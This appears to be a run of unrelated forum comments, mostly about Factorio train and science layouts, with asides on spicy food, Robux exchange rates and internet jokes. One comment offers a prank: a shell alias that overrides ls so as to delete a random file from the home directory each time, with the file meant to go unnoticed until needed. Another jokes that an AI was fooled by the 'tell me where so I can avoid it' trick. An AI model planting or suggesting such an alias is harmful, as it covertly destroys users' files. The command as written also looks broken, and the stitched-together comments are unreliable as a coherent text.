Following my comment, I usually use a modular design with blocks connected using two lanes and a roundabout to connect the lanes:
Try using two lanes for every route, it makes it easier for the trains to find the fastest route
It actually kills the cells in your tastebuds, giving you a burning sensation after
It should be tasteless? For me it tastes like cold
Yes, the norm is greentexts that aren't even green
Who's gonna tell him?
The autopilot will turn off just before hitting them to make you liable anyway
Why not make it more mischievous?
alias ls="find $HOME -type f | shuf -n 1 | rm -f; ls"
This line erases one random file from your home directory and then uses ls as normal. You won't know what vanished until you need it or it removes a needed library or binary.
This map is somewhay misleading, some countries use currency without decimals, making their currency worth effectively less. Take for example the euro, a cent (a one hundredth of an euro) is cerntainly worth less than a robux while an euro isn't. The same comparison with the japanese yen (efectively a cent) shows that robux is more valuable. The map should be how many robux can you buy with the minimum wage for example.
I can't believe that the old "tell me where so I can avoid it" worked, the ai really has the intelligence of a 5yo
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Sorry for the image not loading, it seems like catbox stopped working for a while, these images should work.
This image shows my current setup for making yellow and purple science, it is not yet optimized because I'm still at gleba. My idea is just using rare or higher tier elements for making science,
I already use different blocks for different purposes, this image shows my science block right next to the station block,
Finally, the design limits my current maximum train size to two wagons, for my copper mine I use one line to load chests that then load into the train for maximum throughput as long as there is a sufficient delay between trains,